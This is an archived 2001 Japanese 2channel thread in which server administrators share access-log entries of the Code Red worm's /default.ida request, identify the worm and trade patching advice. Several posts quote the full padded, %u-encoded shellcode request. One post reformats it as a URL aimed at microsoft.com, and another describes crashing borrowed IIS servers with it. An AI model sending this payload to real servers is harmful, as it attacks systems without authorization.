5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ええかげんにせんかい!

1 :アパッチャー:2001/07/20(金) 06:39
63.89.138.37 - - [20/Jul/2001:05:54:41 +0900]
"GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u78
01%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00
c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 400 252 "-" "-"

なげ〜〜〜! いったい何を持って逝きたいのか??
先ほどからずっと続いてますが、あなた誰?
みんな大丈夫かい〜

2 :名無しさん@お腹いっぱい。:2001/07/20(金) 07:18
うちにも来たぞい、いろんなIPから6時間で10回ぐらい…
アパッチ建てていないのに
下記にも書いておいた…
http://ton.2ch.net/test/read.cgi?bbs=sec&key=988707245&st=449&to=449&nofirst=true

3 :どむ:2001/07/20(金) 09:00
>>1
それは「.ida "Code Red" Worm」だよ。

By JPCERT/CC

4 :アパッチャー:2001/07/20(金) 09:02
解決、default.ida は
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-----以下長い。
IIS用です。(でした、ふぅ、徹夜で確認)
ルートWebを実行権付けてるとIIS止まります、真似しちゃだめよ。
いちおう、IISのWebを借りて2箇所で確認した、止まった。
クラック EVERYDAY PEOPLEみて過去にやられたサイトを
default.ida 迄で確認だけはできそうなので知り合いのとこがザル
だった。めーるしちゃった。偉い。!
読んだ人は あちこち教えてあげて下さい。
IISの人はルートWebの実行権とスクリプトをOFFにしましょうねって。
フィックスも全部あてようね〜。

5 :アパッチャー:2001/07/20(金) 09:24
>3 どむ3
あらま7/19版で書いてるね、最新じゃないの。
パッチ当ててもルートの実行とめなきゃ意味無しなんだね〜。

6 :名無しさん:2001/07/20(金) 10:13
>>2
apacheって・・・
"default.・・・”ってとこで脊髄反射でIISへのアタックって気づくだろ(藁

7 :アパッチャー:2001/07/20(金) 11:22
そそ。朝の早くからツレんとこ電話してNT貸せ!って
あそんできた。これが噂の〜とか半分はしゃいでたな 鷲

8 :IISってすぐにコネクション切ってくれないね、さびしいのかしら(藁:2001/07/20(金) 19:30
http://www.microsoft.com//default.ida?NNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090
%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090
%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

>>4
なるほど、こんな感じで最寄りのIISにアクセスしてやると良い訳だなぁ(藁
ちゃんと1行に戻してね!

9 :名無しさん@お腹いっぱい。 :2001/07/20(金) 23:50
あ、それ昨日オレの所にも来た。無差別で送り込んでいるみたいね。
とりあえず、串さしてた所の管理者にログ暮れってメールしてみた。

10 :名無しさん@お腹いっぱい。:2001/07/21(土) 19:11
もう攻撃は止まってるとおもうけど:
http://www.zdnet.co.jp/news/0107/21/b_0720_02.html

時間狂ってるマシンで動いてるIISから、まだ攻撃くるかもね

うちは、Cisco675つかってるんで、Ciscoのサポートページで
ファームウェアを見つけるまで大変だったよ…もうすこしわか
りやすいページ構成にしてくれ>Cisco<Intelよりわかりづら
いジャン

11 :名無しさん@お腹いっぱい。 :2001/07/21(土) 19:43
default.ida?ほげほげをしたら
最高のエロ画像を表示させてるんだけど

英語で
相手が本気で頭くるような文句、ないかな?

12 :名無しさん@お腹いっぱい。:2001/07/21(土) 20:44
>>11
you is a big fool man. hahahaha

13 :名無しさん@お腹いっぱい。:2001/07/21(土) 23:01
fuck my asshole

14 :名無しさん@お腹いっぱい。:2001/07/21(土) 23:22
133.9.193.202 - - [20/Jul/2001:02:20:26 +0900]
"GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 以下、略
早稲田大学から食らった。

15 :?:2001/07/21(土) 23:40
>>14
定番だね。
厨房学生のおもちゃマシンだろ

16 :落第決定:2001/07/21(土) 23:52
>12
ワラタ
you is と言った時点で追試決定です。
もう少し勉強しましょう。夏休み無し!
だれか12に正確な英語を指南してやれ。

17 :名無しさん@お腹いっぱい。:2001/07/21(土) 23:56
>>12
>>16

どっちも微妙だ
ネタかどうか判断に苦しむ

18 :名無しさん@お腹いっぱい。:2001/07/21(土) 23:57
>16
有名なネタです。知らない君こそ、夏休み無し!

19 :名無しさん@お腹いっぱい。:2001/07/22(日) 00:13
I am the hacker who goes into 5 fingers in Japan.

20 :名無しさん@お腹いっぱい。:2001/07/22(日) 00:27
>>15
誰ぞの研究室だと思われ。
http://133.9.193.202/

21 :名無しさん@お腹いっぱい。:2001/07/22(日) 01:45
>18
クラッククッキーでしたっけ?

22 :名無しさん@お腹いっぱい。:2001/07/22(日) 01:54
>>21
http://historicaldocuments.kharakhorum.net/hacker/kkc/kkc.html

23 :落第決定は俺?:2001/07/22(日) 03:45
16デス、ここは2chな事を忘れていました。廊下に立ってていいですか?
2学期まで遠すぎます。差し入れモトム。

24 :sage:2001/07/22(日) 03:58
>>23
部活にでるとき持ってくよ

25 :名無しさん@お腹いっぱい。:2001/07/22(日) 13:55
>>23
you is a big fool man. hahahaha

これはマジで有名なネタだよ

26 :名無しさん@お腹いっぱい。:2001/07/26(木) 03:32


27 :ADSL:2001/08/01(水) 23:56
うちADSL回線だけど、
210.99.105.104 - - [01/Aug/2001:22:45:25 +0900] "GET /default.ida?NNNNNNNNNNN
来ました。

28 :ごめんなさい:2001/08/02(木) 00:04
同じスレッドたてちゃいました

29 :名無しさん@お腹いっぱい。:2001/08/02(木) 00:39
国内の被害は大丈夫なのか?
IIS入れてる管理者ってちゃんとパッチ当ててないような
気がするのは偏見?

30 :あぼーん:2001/08/02(木) 17:50
あぱっちもやられてるけど
IISの管理者ドキュソだね。
ttp://people.site.ne.jp/2001/2001.html

7 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)